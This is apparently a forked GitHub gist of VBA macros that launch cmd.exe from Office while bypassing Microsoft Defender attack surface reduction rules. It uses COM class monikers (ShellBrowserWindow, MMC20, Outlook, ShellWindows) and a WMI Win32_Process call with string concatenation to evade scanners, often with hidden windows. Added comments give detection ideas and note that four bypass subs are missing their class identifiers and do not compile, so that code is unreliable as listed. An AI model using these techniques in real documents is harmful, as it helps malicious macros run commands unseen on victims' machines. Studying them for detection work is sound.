
Forked from infosecn1nja/ASR Rules Bypass.vba
Created September 16, 2019 22:30
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
Sub ASR_blocked()
    ' Baseline case: the macro asks WScript.Shell to run cmd.exe.
    ' Going by the Sub name, the author expects the ASR child-process rule
    ' for Office applications to block this call.
    With CreateObject("Wscript.Shell")
        .Run "cmd.exe"
    End With
End Sub
Sub ASR_blocked2()
    ' Baseline case: cmd.exe is launched through Shell.Application.ShellExecute.
    ' Going by the Sub name, the author expects the ASR child-process rule
    ' to block this call.
    With CreateObject("Shell.Application")
        .ShellExecute "cmd.exe"
    End With
End Sub
Sub ASR_blocked3()
    ' Baseline case: the built-in VBA Shell function starts cmd.exe.
    ' vbNormalFocus is the named constant for window style 1.
    ' Going by the Sub name, the author expects this call to be blocked.
    Shell "cmd.exe", vbNormalFocus
End Sub
Sub ASR_blocked4()
    ' Baseline case: WScript.Shell.Exec starts cmd.exe and returns an object
    ' for the running process, which is kept only until the Sub exits.
    ' Going by the Sub name, the author expects this call to be blocked.
    Set execHandle = CreateObject("WScript.Shell").Exec("cmd.exe")
End Sub
Sub ASR_blocked5()
    ' Baseline case: a second Excel instance is automated and asked to open
    ' a DDE channel to "cmd" with the topic "/c notepad.exe".
    ' Alerts are switched off first so no prompt is shown to the user.
    ' Going by the Sub name, the author expects this call to be blocked.
    With CreateObject("Excel.Application")
        .DisplayAlerts = False
        .DDEInitiate "cmd", "/c notepad.exe"
    End With
End Sub
Sub ASR_bypass_create_child_process_rule()
' Purpose: start cmd.exe through a COM object obtained from a "new:" class
' moniker instead of calling a shell API from the macro itself.
' NOTE(review): the Const below ends with a line continuation, but the
' continued line holding the class identifier is absent from this copy, so
' the Sub does not compile as listed.
Const ShellBrowserWindow = _
Set SBW = GetObject("new:" & ShellBrowserWindow)
' ShellExecute arguments: file, arguments (Null), working directory,
' verb (Null), window style 0 (hidden window).
' Detection note: presumably the object is hosted outside the Office
' process, so cmd.exe would not show up as a child of the Office
' application and parent/child rules keyed on Office would not fire.
' Monitor for Office VBA resolving "new:" monikers and for unexpected
' cmd.exe launches from the hosting process -- TODO confirm in telemetry.
SBW.Document.Application.ShellExecute "cmd.exe", Null, "C:\Windows\System32", Null, 0
End Sub
Sub ASR_bypass_create_child_process_rule2()
' Purpose: start cmd.exe by calling ExecuteShellCommand on the active view
' of a COM object obtained from a "new:" class moniker.
' NOTE(review): the Const below ends with a line continuation, but the
' continued line holding the class identifier is absent from this copy, so
' the Sub does not compile as listed.
Const ExecuteShellCommand = _
Set MMC20 = GetObject("new:" & ExecuteShellCommand)
' Detection note: the variable name suggests an MMC automation object; if
' so, the command would presumably be started by the MMC host rather than
' by the Office application. An MMC process with no interactive user
' session behind it that spawns a shell is worth alerting on -- TODO
' confirm in telemetry.
MMC20.Document.ActiveView.ExecuteShellCommand ("cmd.exe")
End Sub
Sub ASR_bypass_create_child_process_rule3()
' Purpose: obtain a COM object from a "new:" class moniker, have that object
' create WScript.Shell, and run cmd.exe with window style 0 (hidden).
' NOTE(review): the Const below ends with a line continuation, but the
' continued line holding the class identifier is absent from this copy, so
' the Sub does not compile as listed.
Const OUTLOOK = _
Set objShell = GetObject("new:" & OUTLOOK)
' Mitigation note: the constant name suggests the intermediate object is
' Outlook. Child processes of Outlook are covered by a separate ASR rule,
' "Block Office communication application from creating child processes";
' verify that rule is enabled as well as the general Office one.
objShell.CreateObject("WScript.Shell").Run "cmd.exe", 0
End Sub
Sub ASR_bypass_create_child_process_rule4()
' Purpose: take an item from a COM collection obtained from a "new:" class
' moniker and call ShellExecute on that item's Document.Application.
' NOTE(review): the Const below ends with a line continuation, but the
' continued line holding the class identifier is absent from this copy, so
' the Sub does not compile as listed.
Const ShellWindows = _
Set SW = GetObject("new:" & ShellWindows).Item()
' ShellExecute arguments: file, arguments (Null), working directory,
' verb (Null), window style 0 (hidden window).
' Detection note: presumably the launch is carried out by the process that
' owns the returned window object, not by the Office application, so
' detections keyed on an Office parent process would miss it -- TODO
' confirm the actual parent in telemetry.
SW.Document.Application.ShellExecute "cmd.exe", Null, "C:\Windows\System32", Null, 0
End Sub
Sub ASR_bypass_create_child_process_rule5()
' Purpose: start cmd.exe through the WMI Win32_Process Create method rather
' than through a shell call made by the macro.
' The WMI moniker and class names are assembled from string fragments, so
' content scanners that match whole strings need to normalise
' concatenations before matching.
' "." addresses the local computer.
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
' Build a Win32_ProcessStartup instance to carry the window setting.
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
' NOTE(review): HIDDEN_WINDOW is not declared anywhere in this listing;
' unless it is defined elsewhere in the module it is presumably an empty
' Variant at this point -- confirm.
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
' Create arguments: command line, current directory (Null), startup
' configuration, and a variable that receives the new process id.
' Mitigation note: the process is requested through the WMI service, not
' spawned by Office directly. The separate ASR rule "Block process
' creations originating from PSExec and WMI commands" and WMI activity
' logging are the relevant controls -- verify coverage in your environment.
objProcess.Create "cmd.exe", Null, objConfig, intProcessID
End Sub